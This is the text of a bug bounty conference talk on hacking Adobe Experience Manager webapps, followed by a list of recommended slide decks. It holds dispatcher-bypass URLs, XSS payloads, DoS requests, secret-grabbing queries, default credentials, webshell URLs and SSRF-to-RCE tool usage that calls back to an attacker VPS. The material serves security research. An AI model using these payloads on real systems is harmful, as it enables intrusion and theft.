SlideShare a Scribd company logo

AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs

Mikhail Egorov
Mikhail Egorov

Presentation from LevelUp 0x03 conference - https://forum.bugcrowd.com/t/levelup-0x03-aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs-by-0ang3el/

Internet
1 of 124
Download to read offline
AEM hacker approaching Adobe Experience Manager webapps in bug bounty programs Mikhail Egorov @0ang3el
Mikhail Egorov • Whitehat, security researcher, bug hunter, conference speaker • Bugcrowd – https://www.bugcrowd.com/0ang3el • H1 – https://www.hackerone.com/0ang3el • Twitter - @0ang3el • GitHub - https://github.com/0ang3el • Slideshare - https://www.slideshare.net/0ang3el • Speakerdeck - https://speakerdeck.com/0ang3el • LinkedIn - https://www.linkedin.com/in/0ang3el 2/124
Why this talk? • A lot of AEM targets are in scope of BBP or VPD • AEM webapps are usually insecure • Security misconfigurations (AEM is complex) • Not installed security updates • Attract attention to AEM webapps insecurity • Motivate bug hunters to test AEM webapps 3/124
Topics to discuss • Methodology w/ bug examples • Automation • AEM Hacker Toolset – https://github.com/0ang3el/aem-hacker.git • AEM RCE bundle – https://github.com/0ang3el/aem-rce-bundle.git • Only known vulnerabilities and techniques are discussed!!! 4/124
Public BBP with AEM targets in scope 5/124
Public VPD with AEM targets in scope 6/124
Personal achievements in 2018 • Reported 84 non-duplicate bugs on Bugcrowd and H1 for AEM targets • P1s – 38 issues • P2s – 37 issues • P3s – 7 issues • P4s – 2 issue • Got 2 CVEs from Adobe PSIRT 7/124
Personal achievements in 2018 • P1s • RCE • Secrets disclosure (passwords, tokens) • P2s • Internal SSRF, High impact • Stored XSS • Application-level DoS, Easy Difficulty • P3s • Internal SSRF, Medium impact • Reflected XSS • Application-level DoS, Medium Difficulty • P4s • Reflected XSS, Flash-based 8/124
Previous works 2015 - https://www.slideshare.net/0ang3el/hacking-aem-sites 2016 - http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com- Remote-Code-Execution-Write-Up.html 2018 - https://speakerdeck.com/fransrosen/a-story-of-the-passive- aggressive-sysadmin-of-aem 2018 - https://medium.com/@jonathanbouman/reflected-xss-at-philips-com- e48bf8f9cd3c 2018 - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem- webapps 9/124
AEM dispatcher
AEM architecture • Based on open source projects • Apache Felix • Apache Sling • Apache OAK JCR https://helpx.adobe.com/experience-manager/using/osgi_getting_started.html 11/124
Common AEM deployment Main blocks: • Author AEM instance • Publish AEM instance • AEM dispatcher (~WAF) Interacts with Publish server via AEM Dispatcher! 4503/tcp 4502/tcp 443/tcp ? 12/124
AEM dispatcher • In theory … a front end system offers an extra layer of security to your Adobe Experience Manager infrastructure • Often in practice … it’s the only security layer!!! • Admins rarely keep all components on Publish instance updated and securely configured! • Dispatcher bypasses allow to talk to those “insecure” components on Publish instance 13/124
AEM Dispatcher bypasses • CVE-2016-0957 • Bypasses for “interesting” servlets • Add multiple slashes • SSRF • Other 14/124
Using CVE-2016-0957 /filter { # Deny everything first and then allow specific entries /0001 { /type "deny" /glob "*" } /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only /0041 { /type "allow" /url "*.css" } # enable css /0042 { /type "allow" /url "*.gif" } # enable gifs /0043 { /type "allow" /url "*.ico" } # enable icos /0044 { /type "allow" /url "*.js" } # enable javascript /0045 { /type "allow" /url "*.png" } # enable png /0046 { /type "allow" /url "*.swf" } # enable flash /0047 { /type "allow" /url "*.jpg" } # enable jpg /0048 { /type "allow" /url "*.jpeg" } # enable jpeg /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization Policy dispatcher.any before CVE-2016-0957 15/124
Using CVE-2016-0957 # Deny content grabbing /0081 { /type "deny" /url "*.infinity.json" } /0082 { /type "deny" /url "*.tidy.json" } /0083 { /type "deny" /url "*.sysview.xml" } /0084 { /type "deny" /url "*.docview.json" } /0085 { /type "deny" /url "*.docview.xml" } /0086 { /type "deny" /url "*.*[0-9].json" } # Deny query (and additional selectors) /0090 { /type "deny" /url "*.query*.json" } } Policy dispatcher.any before CVE-2016-0957 16/124
Using CVE-2016-0957 Blocked Allowed https://aemsite/bin/querybuilder.json https://aemsite/bin/querybuilder.json/a.css https://aemsite/bin/querybuilder.json/a.html https://aemsite/bin/querybuilder.json/a.ico https://aemsite/bin/querybuilder.json/a.png https://aemsite/bin/querybuilder.json;%0aa.css https://aemsite/bin/querybuilder.json/a.1.json 17/124
Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 /filter { # Deny everything first and then allow specific entries /0001 { /type "deny" /glob "*" } # Allow non-public content directories /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only # Enable extensions in non-public content directories, using a regular expression /0041 { /type "allow" /extension '(clientlibs|css|gif|ico|js|png|swf|jpe?g|woff2?)’ } 18/124
Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 # Enable features /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization # Deny content grabbing, on all accessible pages, using regular expressions /0081 { /type "deny" /selectors '((sys|doc)view|query|[0-9-]+)’ /extension '(json|xml)’ } 19/124
Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 # Deny content grabbing for /content /0082 { /type "deny" /path "/content" /selectors '(feed|rss|pages|languages|blueprint|infinity|tidy)’ /extension '(json|xml|html)’ } } 20/124
Bypasses for “interesting” servlets https://aemsite/bin/querybuilder.json https://aemsite/bin/querybuilder.json/a.css https://aemsite/bin/querybuilder.json;%0aa.css https://aemsite/bin/querybuilder.json.servlet.css https://aemsite/bin/querybuilder.json.servlet.html https://aemsite/bin/querybuilder.json.servlet.ico https://aemsite/bin/querybuilder.json.servlet.png Blocked Allowed 21/124
Add multiple slashes • ///etc.json instead of /etc.json • ///bin///querybuilder.json instead of /bin/querybuilder.json 22/124
Using SSRF • We need SSRF in a component that is allowed by AEM dispatcher policy • SSRF should allow to send GET request and see response • Opensocial (Shindig) proxy • SSRF in ReportingServicesProxyServlet (CVE-2018-12809) 23/124
Automation
AEM RCE bundle • AEM RCE bundle – https://github.com/0ang3el/aem-rce-bundle.git • Has pre-build OSGI bundle for AEM 6.2 or newer • Allows to get RCE when you have access to Felix Console • Happens when you guessed admin credentials 25/124
AEM RCE bundle, build yourself mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate -DarchetypeGroupId=com.adobe.granite.archetypes -DarchetypeArtifactId=aem-project-archetype -DarchetypeVersion=11 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate -DarchetypeGroupId=com.day.jcr.vault -DarchetypeArtifactId=multimodule-content-package-archetype -DarchetypeVersion=1.0.2 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ For AEM 6.0 or newer For AEM 5.6 26/124
AEM RCE bundle /bin/backdoor.html?cmd=ifconfig 27/124
AEM hacker toolset • Toolset – https://github.com/0ang3el/aem-hacker.git • Includes scripts • aem_hacker.py • aem_discoverer.py • aem_enum.py • aem_ssrf2rce.py, aem_server.py, response.bin • aem-rce-sling-script.sh 28/124
aem_hacker.py • Main tool – scans AEM webapp for misconfigurations and vulnerabilities • Tries to bypass AEM dispatcher • You need to run it from VPS to detect SSRFs! • You need to do extra manual work to detect if findings are exploitable 29/124
aem_hacker.py python3 aem_hacker.py -h usage: aem_hacker.py [-h] [-u URL] [--proxy PROXY] [--debug] [--host HOST] [--port PORT] [--workers WORKERS] AEM hacker by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit -u URL, --url URL url to scan --proxy PROXY http and https proxy --debug debug output --host HOST hostname or IP to use for back connections during SSRF detection --port PORT opens port for SSRF detection --workers WORKERS number of parallel workers 30/124
aem_hacker.py python3 aem_hacker.py -u https://aem.webapp --host your_vps_hostname_ip • Common usage 31/124
aem_hacker.py – checks 1/3 • Exposed DefaultGetServlet • Exposed QueryBulderJsonServlet and QueryBuilderFeedServlet • Exposed GQLServlet • Exposed POSTServlet • Exposed LoginStatusServlet • Users with default password • Exposed Felix Console • Enabled WCMDebugFilter 32/124
aem_hacker.py – checks 2/3 • Exposed WCMSuggestionsServlet • Exposed AuditlogServlet • Exposed CRXDE logs • Exposed CRXDE and CRX • SSRF SalesforceSecretServlet • SSRF ReportingServicesServlet • SSRF SitecatalystServlet • SSRF AutoprovisioningServlet 33/124
aem_hacker.py – checks 3/3 • SSRF OpensocialProxy • SWF XSSes • Deser ExternalJobServlet • Exposed Webdav • Exposed Groovy Console • Exposed ACS AEM Tools 34/124
aem_discoverer.py • Allows to scan urls and find AEM webapps among them • Tries to bypass AEM dispatcher • Common usage python3 aem_discoverer.py --file urls.txt --workers 150 35/124
aem_discoverer.py python3 aem_discoverer.py -h usage: aem_discoverer.py [-h] [--file FILE] [--proxy PROXY] [--debug] [--workers WORKERS] AEM discoverer by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit --file FILE file with urls --proxy PROXY http and https proxy --debug debug output --workers WORKERS number of parallel workers 36/124
aem_enum.py • Automate usernames and secrets grabbing • Traverses JCR using DefaultGetServlet of AEM 37/124
aem_enum.py python3 aem_enum.py -h usage: aem_enum.py [-h] [--url URL] [--base BASE] [--grabdepth GRABDEPTH] [--maxdepth MAXDEPTH] [--workers WORKERS] [--out OUT] [--proxy PROXY] [--debug] AEM exploration tool by @0ang3el (grabs users and secrets), see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit --url URL AEM webapp URL, required parameter --base BASE set base node (/etc or /apps or /home or /var), if not set, base node is selected automatically --grabdepth GRABDEPTH JCR subtree depth on each iteration, 2 should be a safe value for all nodes --maxdepth MAXDEPTH maximum depth for JCR search, increase it to find more --workers WORKERS number of parallel workers --out OUT CSV file with results, delimiter symbol is | --proxy PROXY http and https proxy --debug debug output 38/124
aem_enum.py • Common usage • Change start node python3 aem_enum.py --url https://aem.webapp python3 aem_enum.py --url https://aem.webapp --base /etc 39/124
aem_ssrf2rce.py & aem_server.py • aem_ssrf2rce.py & aem_server.py + response.bin • Helps to exploit SSRF in SitecatalystServlet or AutoprovisioningServlet as RCE • It should work on AEM before AEM-6.2-SP1-CFP7 running on Jetty • Exploits reverse replication to get RCE after joining topology using SSRF 40/124
aem_ssrf2rce.py python3 aem_ssrf2rce.py -h usage: aem_ssrf2rce.py [-h] [--url URL] [--fakeaem FAKEAEM] [--proxy PROXY] optional arguments: -h, --help show this help message and exit --url URL URL for SitecatalystServlet or AutoprovisioningServlet, including path, without query part --fakeaem FAKEAEM hostname/ip of fake AEM server --proxy PROXY http and https proxy 41/124
aem_ssrf2rce.py & aem_server.py • Place aem_server.py and response.bin on your VPS • Run aem_server.py script python3 aem_server.py starting fake AEM server... running server... 42/124
aem_ssrf2rce.py & aem_server.py • Run aem_ssrf2rce.py script python3 aem_ssrf2rce.py --url https://aem.webapp/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet --fakeaem your_vps_hostname_ip 43/124
aem_ssrf2rce.py & aem_server.py • If RCE is possible, you should see incoming connection to your fake AEM server • Shell is accessible from https://aem.webapp/rcenode.html?Vgu9BKV9zdvJNByNh9NB=ls 44/124
aem-rce-sling-script.sh • Allows to get RCE when Felix Console is not available, but you have permissions to create new nodes under /apps JCR node • Usage • Shell is available at https://aem.webapp/rcenode.html?cmd=ls ./aem-rce-sling-script.sh https://aem.webapp username password 45/124
Methodology
Insecurity of bundles and packages
RCE via exposed Groovy console https://github.com/OlsonDigital/aem-groovy-console 48/124
RCE via exposed Groovy console • Exposes servlet at without authentication 49/124
RCE via exposed Groovy console 50/124
RCE via ACS AEM Tools • https://adobe-consulting-services.github.io/acs-aem-tools/ 51/124
RCE via ACS AEM Tools • Exposes Fiddle with ability to execute JSP scripts at • • May or may not require authentication 52/124
RCE via ACS AEM Tools 53/124
Leveraging different levels of access
What can you do w/ valid creds? • RCE • Deface site – create/modify/delete content • Persistent XSS 55/124
How to get valid creds? • Default credentials • admin:admin • author:author • Bruteforce creds • properties , , , etc. contain usernames • automates usernames grabbing • AEM supports basic authorization 56/124
RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps WebDAV 57/124
RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload AEM RCE OSGI bundle WebDAVhttps://github.com/0ang3el/aem-rce-bundle.git 58/124
RCE via uploading OSGI bundle 59/124
RCE via uploading OSGI bundle 60/124
RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload JSP script to /apps WebDAV https://sling.apache.org/documentation/getting-started/discover-sling-in-15-minutes.html aem-rce-sling-script.sh 61/124
RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload JSP script to /apps WebDAV cadaver https://aem.webapp/crx/repository/crx.default https://sling.apache.org/documentation/getting-started/discover-sling-in-15-minutes.html 62/124
Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Lite 63/124
Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Lite https://sling.apache.org/documentation/bundles/manipulating-content-the-slingpostservlet-servlets-post.html 64/124
Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Lite cadaver https://aem.webapp/crx/repository/crx.default 65/124
Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Litehttps://aem.webapp/crx/de/index.jsp 66/124
Non-privileged user SlingPOSTServlet WebDAV Find node with weak ACL Other CRXDE Lite hasPermission predicate of Querybuilder 67/124
Non-privileged user SlingPOSTServlet WebDAV Find node with weak ACL Other CRXDE Lite hasPermission predicate of Querybuilder https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html#hasPermission 68/124
Anonymous user SlingPOSTServlet WebDAV Find node with weak ACL Other CRXDE Lite /content/usergenerated /content/usergenerated/etc/commerce/smartlists hasPermission predicate of Querybuilder Anonymous usually has jcr:write permission for node Anonymous usually has jcr:addChildNode permission for node 69/124
Tricks to get persistent XSS • SVG in property value • create property with SVG content • add /a.svg to the URL • HTML in property value • create property with HTML content and name aaa.html • jcr:data and jcr:mimeType (upload file) • Other 70/124
Anonymous user & SVG 71/124
Anonymous user & SVG 72/124
Anonymous user & SVG 73/124
Anonymous user & HTML prop 74/124
Anonymous user & HTML prop 75/124
Anonymous user & upload file 76/124
Anonymous user & upload file 77/124
Extracting secrets from JCR
Extracting secrets from JCR • Everything is stored in JCR repository as node properties including: • Secrets (passwords, encryption keys, tokens) • Configuration • PII • Usernames 79/124
Why is it possible? • ACL is misconfigured for a JCR node, storing secrets • Admins rely on AEM dispatcher protection 80/124
What to use • DefaultGetServlet • QueryBuilderJsonServlet • QueryBuilderFeedServlet • GQLSearchServlet • Other 81/124
DefaultGetServlet • Allows to get JCR node with its props • Selectors • tidy • infinity • numeric value: -1, 0, 1 … 99999 • Formats • json • xml • res 82/124
DefaultGetServlet https://aem.site/.tidy.3.json jcr:root selector tidy selector depth output format Get JCR nodes with props starting from jcr:root with depth 3 and return formatted JSON 83/124
DefaultGetServlet - How to grab • Get node names, start from • /.1.json • /.ext.json • /.childrenlist.json • Or guess node names: • Common names - /content, /home, /var, /etc • Dump props for each child node of • /etc.json or /etc.5.json or /etc.-1.json 84/124
DefaultGetServlet – What to grab • Interesting nodes • /etc – may contain secrets (passwords, enc. keys, …) • /apps/system/config or /apps/<smth>/config (passwords, …) • /var – may contain private information (PII) • /home – password hashes, PII • Interesting props – contain AEM users names • jcr:createdBy • jcr:lastModifiedBy • cq:LastModifiedBy 85/124
DefaultGetServlet – In the wild /apps/<redacted>/config.author.tidy.1..json/a.ico 86/124
DefaultGetServlet – In the wild /etc/ocs/libs/puppet/bootstrap/etc/ssl/private/ocs-x509-client-key.pem/jcr:content/jcr:data.tidy.-1…json/b.gif 87/124
QueryBuilder servlets • We can search JCR using different predicates • https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder- predicate-reference.html • QueryBuilderJsonServlet allows to get Nodes and their Props • /bin/querybuilder.json • QueryBuilderFeedServlet allows to get Nodes (no Props) • /bin/querybuilder.feed.servlet • we can use blind binary search for Props 88/124
Examples of useful searches • type=nt:file&nodename=*.zip • path=/home&p.hits=full&p.limit=-1 • hasPermission=jcr:write&path=/content • hasPermission=jcr:addChildNodes&path=/content • hasPermission=jcr:modifyProperties&path=/content • p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alast ModifiedBy&property.operation=unequals&property.value=admin&type=n t%3abase&p.limit=1000 • path=/etc&path.flat=true&p.nodedepth=0 • path=/etc/replication/agents.author&p.hits=full&p.nodedepth=-1 89/124
QueryBuilder – In the wild type=nt:file&nodename=*.zip 90/124
QueryBuilder – In the wild path=/home&p.hits=full&p.limit=-1 91/124
QueryBuilder – In the wild path=/apps/system/config 92/124
QueryBuilder – In the wild hasPermission=jcr:write&path=/content 93/124
Exploiting SSRFs
Opensocial (Shindig) proxy • SSRF via Opensocial (Shindig) proxy • • • Allows to send GET request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from internal network services • Bypass AEM dispatcher and ex-filtrate secrets from JCR • Reflected XSS 95/124
Opensocial (Shindig) proxy 96/124
ReportingServicesProxyServlet • SSRF via ReportingServicesProxyServlet (CVE-2018-12809) • • • Allows to send GET request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from internal network services • Bypass AEM dispatcher and ex-filtrate secrets from JCR • Reflected XSS 97/124
ReportingServicesProxyServlet 98/124
ReportingServicesProxyServlet 99/124
SalesforceSecretServlet 100/124 • SSRF via SalesforceSecretServlet (CVE-2018-5006) • • Allows to send POST request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from some internal network services • POST ≡ GET • Reflected XSS
SalesforceSecretServlet 101/124
SalesforceSecretServlet 102/124
SiteCatalystServlet • SSRF via SiteCatalystServlet • • • Allows to send POST request to an arbitrary URL blindly, allows to send arbitrary headers (CRLF injection) • Suitable for • Access internal network services (hard in blackbox scenario) • RCE (requires specific AEM version and appserver) 103/124
AutoProvisioningServlet 104/124
AutoProvisioningServlet • SSRF via AutoProvisioningServlet • • Allows to send POST request to an arbitrary URL blindly, allows to send arbitrary headers (CRLF injection) • Suitable for • Access internal network services (hard in blackbox scenario) • RCE (requires specific AEM version and appserver) 105/124
AutoProvisioningServlet 106/124
SSRF >>> RCE • It’s possible to escalate SSRFs in SiteCatalystServlet and AutoProvisioningServlet to RCE on Publish server • Requirements • AEM 6.2 before AEM-6.2-SP1-CFP7 fix pack • Jetty appserver (default installation) 107/124
2/110 https://www.youtube.com/watch?v=awPJRIR47jo
Old tricks
ExternalJobPostServlet • Old bug, affects AEM 5.5 – 6.1 • http://aempodcast.com/2016/podcast/aem-podcast-java-deserialization-bug/ • • Parameter accepts Java serialized stream and passes to 110/124
ExternalJobPostServlet 111/124
ExternalJobPostServlet 112/124
XXE via WebDAV • Old bug, CVE-2015-1833 • It’s possible to read local files with PROPFIND/PROPPATCH • https://www.slideshare.net/0ang3el/what-should-a-hacker-know-about-webdav 113/124
Check WebDAV support • Send request • header in response contain webdav-related methods • Navigate to • 401 HTTP and WWW-Authenticate: Basic realm="Adobe CRX WebDAV" 114/124
Reflected XSS
Vectors • SWF XSSes (kudos to @fransrosen) • WCMDebugFilter XSS – CVE-2016-7882 • See Philips XSS case @JonathanBoumanium • Many servlets return HTML tags in JSON response • SuggestionHandlerServlet (reflect parameter) 116/124
VideoPlayer.swf /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=alert(document.domain)-window 117/124
WCMDebugFilter /.1.x.%3Csvg%20onload%3dSet.constructor('ale'+'rt(document.domain)')()%20...json?debug=layout 118/124
SuggestionHandlerServlet /bin/wcm/contentfinder/connector/suggestions.json/a.html?query_term=path%3a/&pre=%3Csvg+onload%3dalert(document.domain)%3E &post=yyyy 119/124
Application-level DoS
DoS is easy • /.ext.infinity.json • /.ext.infinity.json?tidy=true • /bin/querybuilder.json?type=nt:base&p.limit=-1 • /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix= • /content.assetsearch.json?query=*&start=0&limit=10&random=123 • /..assetsearch.json?query=*&start=0&limit=10&random=123 • /system/bgservlets/test.json?cycles=999999&interval=0&flushEvery=111111111 121/124
DoS is easy /content.ext.infinity.1..json?tidy=true 122/124
Conclusion • AEM target is a goldmine for a bug hunter • I hope my work will help to approach AEM targets 123/124
THANK U! @0ang3el

Recommended

Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
Mikhail Egorov
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
Mikhail Egorov
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
Mikhail Egorov
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
hacktivity
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 

Recommended

Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
Mikhail Egorov
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
Mikhail Egorov
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
Mikhail Egorov
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
hacktivity
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
Frans Rosén
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applications
Mikhail Egorov
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Soroush Dalili
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
Marco Balduzzi
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource Sharing
Luke Weerasooriya
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Frans Rosén
 
스프링 시큐리티 구조 이해
스프링 시큐리티 구조 이해스프링 시큐리티 구조 이해
스프링 시큐리티 구조 이해
beom kyun choi
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Frans Rosén
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
Aaron Hnatiw
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 
Operating Docker
Operating DockerOperating Docker
Operating Docker
Jen Andre
 
Splunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shellsSplunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shells
Anthony D Hendricks
 

More Related Content

What's hot

Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
Frans Rosén
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applications
Mikhail Egorov
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
Frans Rosén Keynote at BSides Ahmedabad
